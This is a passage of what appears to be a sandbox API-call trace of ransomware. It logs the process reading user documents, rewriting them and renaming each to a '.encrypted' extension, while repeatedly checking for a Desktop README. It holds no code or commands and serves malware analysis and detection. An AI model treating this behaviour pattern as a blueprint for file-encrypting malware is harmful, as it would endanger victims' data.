lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0151.976] GetFileType (hFile=0x4d0) returned 0x1 [0151.976] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0151.976] GetFileType (hFile=0x4d0) returned 0x1 [0151.976] WriteFile (in: hFile=0x4d0, lpBuffer=0x22b5d60*, nNumberOfBytesToWrite=0xd9e0, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x22b5d60*, lpNumberOfBytesWritten=0x2ee884*=0xd9e0, lpOverlapped=0x0) returned 1 [0151.977] CloseHandle (hObject=0x4d0) returned 1 [0151.979] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9BNDTe04t.docx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9BNDTe04t.docx", lpFilePart=0x0) returned 0x36 [0151.979] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9BNDTe04t.docx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9BNDTe04t.docx.encrypted", lpFilePart=0x0) returned 0x40 [0151.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0151.979] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9BNDTe04t.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9bndte04t.docx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x767d9620, ftCreationTime.dwHighDateTime=0x1d5695b, ftLastAccessTime.dwLowDateTime=0xd6a1ad90, ftLastAccessTime.dwHighDateTime=0x1d5c2a5, ftLastWriteTime.dwLowDateTime=0x418cb680, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xd9e0)) returned 1 [0151.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0151.979] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9BNDTe04t.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9bndte04t.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9BNDTe04t.docx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9bndte04t.docx.encrypted")) returned 1 [0151.980] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sF-lI.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sF-lI.xlsx", lpFilePart=0x0) returned 0x33 [0151.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0151.981] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sF-lI.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9sf-li.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0151.981] GetFileType (hFile=0x4d0) returned 0x1 [0151.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0151.981] GetFileType (hFile=0x4d0) returned 0x1 [0151.981] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x19d3 [0151.981] ReadFile (in: hFile=0x4d0, lpBuffer=0x22c3c28, nNumberOfBytesToRead=0x19d3, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x22c3c28*, lpNumberOfBytesRead=0x2ee894*=0x19d3, lpOverlapped=0x0) returned 1 [0151.983] CloseHandle (hObject=0x4d0) returned 1 [0151.997] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0151.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0151.997] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0151.997] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sF-lI.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sF-lI.xlsx", lpFilePart=0x0) returned 0x33 [0151.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0151.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sF-lI.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9sf-li.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0151.998] GetFileType (hFile=0x4d0) returned 0x1 [0151.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0151.998] GetFileType (hFile=0x4d0) returned 0x1 [0151.998] WriteFile (in: hFile=0x4d0, lpBuffer=0x2318c94*, nNumberOfBytesToWrite=0x19e0, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x2318c94*, lpNumberOfBytesWritten=0x2ee884*=0x19e0, lpOverlapped=0x0) returned 1 [0151.999] CloseHandle (hObject=0x4d0) returned 1 [0152.000] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sF-lI.xlsx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sF-lI.xlsx", lpFilePart=0x0) returned 0x33 [0152.000] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sF-lI.xlsx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sF-lI.xlsx.encrypted", lpFilePart=0x0) returned 0x3d [0152.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.000] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sF-lI.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9sf-li.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb814a740, ftCreationTime.dwHighDateTime=0x1d5cc57, ftLastAccessTime.dwLowDateTime=0x355e24e0, ftLastAccessTime.dwHighDateTime=0x1d57ab1, ftLastWriteTime.dwLowDateTime=0x41917940, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x19e0)) returned 1 [0152.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.000] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sF-lI.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9sf-li.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sF-lI.xlsx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9sf-li.xlsx.encrypted")) returned 1 [0152.001] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CjUJmtsyr.odt", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CjUJmtsyr.odt", lpFilePart=0x0) returned 0x35 [0152.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.001] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CjUJmtsyr.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cjujmtsyr.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.003] GetFileType (hFile=0x4d0) returned 0x1 [0152.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.003] GetFileType (hFile=0x4d0) returned 0x1 [0152.003] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x1974 [0152.003] ReadFile (in: hFile=0x4d0, lpBuffer=0x231ab6c, nNumberOfBytesToRead=0x1974, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x231ab6c*, lpNumberOfBytesRead=0x2ee894*=0x1974, lpOverlapped=0x0) returned 1 [0152.004] CloseHandle (hObject=0x4d0) returned 1 [0152.018] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.018] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.018] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CjUJmtsyr.odt", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CjUJmtsyr.odt", lpFilePart=0x0) returned 0x35 [0152.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.018] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CjUJmtsyr.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cjujmtsyr.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.019] GetFileType (hFile=0x4d0) returned 0x1 [0152.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.019] GetFileType (hFile=0x4d0) returned 0x1 [0152.019] WriteFile (in: hFile=0x4d0, lpBuffer=0x236f898*, nNumberOfBytesToWrite=0x1980, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x236f898*, lpNumberOfBytesWritten=0x2ee884*=0x1980, lpOverlapped=0x0) returned 1 [0152.020] CloseHandle (hObject=0x4d0) returned 1 [0152.021] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CjUJmtsyr.odt", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CjUJmtsyr.odt", lpFilePart=0x0) returned 0x35 [0152.021] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CjUJmtsyr.odt.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CjUJmtsyr.odt.encrypted", lpFilePart=0x0) returned 0x3f [0152.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.021] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CjUJmtsyr.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cjujmtsyr.odt"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8f4aa70, ftCreationTime.dwHighDateTime=0x1d5e44d, ftLastAccessTime.dwLowDateTime=0x26f80310, ftLastAccessTime.dwHighDateTime=0x1d5e1f6, ftLastWriteTime.dwLowDateTime=0x4193daa0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x1980)) returned 1 [0152.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.021] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CjUJmtsyr.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cjujmtsyr.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CjUJmtsyr.odt.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cjujmtsyr.odt.encrypted")) returned 1 [0152.023] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ecol784pYTNNS.docx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ecol784pYTNNS.docx", lpFilePart=0x0) returned 0x3a [0152.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ecol784pYTNNS.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ecol784pytnns.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.023] GetFileType (hFile=0x4d0) returned 0x1 [0152.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.023] GetFileType (hFile=0x4d0) returned 0x1 [0152.023] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x118f2 [0152.023] ReadFile (in: hFile=0x4d0, lpBuffer=0x2371724, nNumberOfBytesToRead=0x118f2, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x2371724*, lpNumberOfBytesRead=0x2ee894*=0x118f2, lpOverlapped=0x0) returned 1 [0152.025] CloseHandle (hObject=0x4d0) returned 1 [0152.042] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.042] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.042] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ecol784pYTNNS.docx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ecol784pYTNNS.docx", lpFilePart=0x0) returned 0x3a [0152.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ecol784pYTNNS.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ecol784pytnns.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.044] GetFileType (hFile=0x4d0) returned 0x1 [0152.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.044] GetFileType (hFile=0x4d0) returned 0x1 [0152.044] WriteFile (in: hFile=0x4d0, lpBuffer=0x23f2fe8*, nNumberOfBytesToWrite=0x11900, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x23f2fe8*, lpNumberOfBytesWritten=0x2ee884*=0x11900, lpOverlapped=0x0) returned 1 [0152.046] CloseHandle (hObject=0x4d0) returned 1 [0152.047] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ecol784pYTNNS.docx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ecol784pYTNNS.docx", lpFilePart=0x0) returned 0x3a [0152.047] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ecol784pYTNNS.docx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ecol784pYTNNS.docx.encrypted", lpFilePart=0x0) returned 0x44 [0152.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.047] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ecol784pYTNNS.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ecol784pytnns.docx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb81a750, ftCreationTime.dwHighDateTime=0x1d5dc6d, ftLastAccessTime.dwLowDateTime=0x77fc4040, ftLastAccessTime.dwHighDateTime=0x1d57d7a, ftLastWriteTime.dwLowDateTime=0x41989d60, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x11900)) returned 1 [0152.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.047] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ecol784pYTNNS.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ecol784pytnns.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ecol784pYTNNS.docx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ecol784pytnns.docx.encrypted")) returned 1 [0152.048] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EUeaVFPg9xvOeyoTY.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EUeaVFPg9xvOeyoTY.xlsx", lpFilePart=0x0) returned 0x3e [0152.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.048] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EUeaVFPg9xvOeyoTY.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eueavfpg9xvoeyoty.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.049] GetFileType (hFile=0x4d0) returned 0x1 [0152.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.049] GetFileType (hFile=0x4d0) returned 0x1 [0152.049] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x7407 [0152.049] ReadFile (in: hFile=0x4d0, lpBuffer=0x2404e28, nNumberOfBytesToRead=0x7407, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x2404e28*, lpNumberOfBytesRead=0x2ee894*=0x7407, lpOverlapped=0x0) returned 1 [0152.051] CloseHandle (hObject=0x4d0) returned 1 [0152.069] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0152.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0152.069] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0152.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0152.069] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EUeaVFPg9xvOeyoTY.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EUeaVFPg9xvOeyoTY.xlsx", lpFilePart=0x0) returned 0x3e [0152.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0152.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EUeaVFPg9xvOeyoTY.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eueavfpg9xvoeyoty.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.070] GetFileType (hFile=0x4d0) returned 0x1 [0152.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0152.071] GetFileType (hFile=0x4d0) returned 0x1 [0152.071] WriteFile (in: hFile=0x4d0, lpBuffer=0x2476028*, nNumberOfBytesToWrite=0x7410, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x2476028*, lpNumberOfBytesWritten=0x2ee884*=0x7410, lpOverlapped=0x0) returned 1 [0152.072] CloseHandle (hObject=0x4d0) returned 1 [0152.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EUeaVFPg9xvOeyoTY.xlsx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EUeaVFPg9xvOeyoTY.xlsx", lpFilePart=0x0) returned 0x3e [0152.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EUeaVFPg9xvOeyoTY.xlsx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EUeaVFPg9xvOeyoTY.xlsx.encrypted", lpFilePart=0x0) returned 0x48 [0152.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0152.073] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EUeaVFPg9xvOeyoTY.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eueavfpg9xvoeyoty.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b0320, ftCreationTime.dwHighDateTime=0x1d5db09, ftLastAccessTime.dwLowDateTime=0xfda80a0, ftLastAccessTime.dwHighDateTime=0x1d5dfcf, ftLastWriteTime.dwLowDateTime=0x419afec0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x7410)) returned 1 [0152.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0152.073] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EUeaVFPg9xvOeyoTY.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eueavfpg9xvoeyoty.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EUeaVFPg9xvOeyoTY.xlsx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eueavfpg9xvoeyoty.xlsx.encrypted")) returned 1 [0152.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gke7Hh05Yah.pdf", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gke7Hh05Yah.pdf", lpFilePart=0x0) returned 0x37 [0152.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0152.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gke7Hh05Yah.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gke7hh05yah.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0152.075] GetFileType (hFile=0x4d0) returned 0x1 [0152.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0152.075] GetFileType (hFile=0x4d0) returned 0x1 [0152.075] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x2ee8e8 | out: 